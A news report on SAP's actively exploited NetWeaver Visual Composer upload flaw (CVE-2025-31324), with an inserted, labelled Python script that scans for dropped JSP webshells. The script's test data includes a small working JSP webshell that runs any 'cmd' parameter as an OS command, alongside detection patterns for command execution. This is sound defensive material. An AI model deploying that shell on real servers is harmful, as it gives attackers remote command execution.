SAP Fixes Critical Vulnerability After Evidence of Exploitation

German software company SAP has disclosed and fixed a critical vulnerability in the NetWeaver Visual Composer development server after evidence emerged that it was being exploited in the wild.
NetWeaver Visual Composer is SAP’s web-based modelling tool that allows business process experts and developers to build business application components without requiring manual coding.
The vulnerability, tracked as CVE-2025-31324, is an unauthenticated file upload flaw in the Metadata Uploader component of the SAP NetWeaver Visual Composer Framework, version 7.50.
When exploited, it allows an unauthenticated attacker to upload potentially malicious executable binaries that could severely harm the host system.
“This could significantly affect the confidentiality, integrity and availability of the targeted system,” the CVE.org page for CVE-2025-31324 noted.
SAP has assigned the vulnerability the highest possible severity score, 10.0 (CVSS v3.1).
The company has also released a fix, published in an emergency security update that is accessible only to SAP customers.
Customers have been urged to apply the patched versions as soon as possible.
Evidence of Exploitation
The vulnerability was identified by ReliaQuest in April 2025 while it was investigating multiple customer incidents affecting the SAP NetWeaver technology integration platform, all of which involved unauthorized file uploads and the execution of malicious files.
In an April 22 article sharing findings from its investigation, ReliaQuest said it initially discovered that attackers had uploaded “JSP webshells” into publicly accessible directories, behaviour reminiscent of a remote file inclusion (RFI) vulnerability.
Several affected systems were already running the latest SAP service pack and had applied the patches made available in SAP’s regular monthly update, released on April 8. This indicated that the affected organizations had been hit with a zero-day exploit.
“However, SAP later confirmed it as an unrestricted file upload vulnerability, allowing attackers to upload malicious files directly to the system without authorization,” reads the ReliaQuest report.
Before SAP’s confirmation, ReliaQuest’s initial assessment had tied the exploitation to either a previously disclosed vulnerability such as CVE-2017-9844 or an unreported remote file inclusion (RFI) issue. The attackers also employed the Brute Ratel C4 post-exploitation framework and the Heaven’s Gate evasion technique for execution and defence evasion.
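As an added example (not code from the article, SAP or ReliaQuest), the hunt a defender would run after reading the paragraphs above: walk a servlet root for .jsp files that reach for OS command execution, the defining trait of the dropped webshells described, and optionally restrict the sweep to files modified since a given time. The directory layout (irj/root) and the sample files are constructed here for the demonstration and are assumptions, not paths or content taken from the page.

```python
"""Hunt for JSP webshells dropped into web-accessible directories.

Added example, not from the article, SAP or ReliaQuest.  It scans a
directory tree for .jsp/.jspx files and flags those that invoke OS command
execution or a reflective class loader, traits a dropped webshell has and
normal Visual Composer content should not.  The sample tree is constructed
inline; the "irj/root" layout is an illustrative assumption.
"""
import re
import tempfile
from pathlib import Path

# Patterns that legitimate application pages should not need.
SUSPICIOUS = [
    re.compile(r"Runtime\.getRuntime\(\)\.exec"),   # direct OS command execution
    re.compile(r"ProcessBuilder\s*\("),             # alternative command spawn
    re.compile(r"Class\.forName\s*\("),             # reflective loading of a payload
]

def scan_jsp_tree(root: str, since: float = 0.0) -> list:
    """Return findings [{path, matches}] for .jsp/.jspx files under `root`.

    Only files with a modification time >= `since` (Unix epoch seconds) are
    inspected, so a sweep can be limited to files newer than the last patch.
    """
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in {".jsp", ".jspx"}:
            continue
        if path.stat().st_mtime < since:
            continue
        text = path.read_text(errors="replace")
        hits = [p.pattern for p in SUSPICIOUS if p.search(text)]
        if hits:
            findings.append({"path": path.relative_to(root).as_posix(),
                             "matches": hits})
    return findings

# Constructed sample pages: one ordinary page, one command-execution shell.
BENIGN_JSP = """<%@ page contentType="text/html" %>
<html><body><h1>Hello <%= request.getParameter("name") %></h1></body></html>
"""

WEBSHELL_JSP = """<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
InputStream in = p.getInputStream();
int c; while ((c = in.read()) != -1) out.print((char) c);
%>
"""

def build_sample_tree() -> str:
    """Create a constructed tree mimicking a servlet root (assumed layout)."""
    root = tempfile.mkdtemp(prefix="jsp_hunt_")
    base = Path(root) / "irj" / "root"
    (base / "static").mkdir(parents=True)
    (base / "static" / "index.jsp").write_text(BENIGN_JSP)
    (base / "helper.jsp").write_text(WEBSHELL_JSP)
    # Non-JSP file with the same string: must be ignored by the scanner.
    (base / "notes.txt").write_text("Runtime.getRuntime().exec -- plain text")
    return root

def hunt() -> list:
    """Scan the constructed tree and return the flagged relative paths."""
    return sorted(f["path"] for f in scan_jsp_tree(build_sample_tree()))

if __name__ == "__main__":
    for finding in scan_jsp_tree(build_sample_tree()):
        print(finding["path"], "->", ", ".join(finding["matches"]))
```

Point the scanner at the real servlet root and pass the timestamp of the April 8 patch cycle as `since` to surface only files that appeared afterwards; any hit is a file to pull for analysis rather than a conviction on its own.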
After being contacted by ReliaQuest, SAP, which itself is a CVE Numbering Authority (CNA), publicly reported the vulnerability on April 24 and released a fix.
According to ReliaQuest, SAP’s solutions are likely an attractive target for threat actors for two key reasons.
“First, they are often used by government agencies, meaning that successful compromise of SAP vulnerabilities is likely to facilitate access to government-related networks and information. Second, as SAP solutions are often deployed on-premises, security measures for these systems are left to users; updates and patches that are not applied promptly are likely to expose these systems to greater risk of compromise,” the ReliaQuest researchers wrote.
Photo credits: Kittyfly/T. Schneider/Shutterstock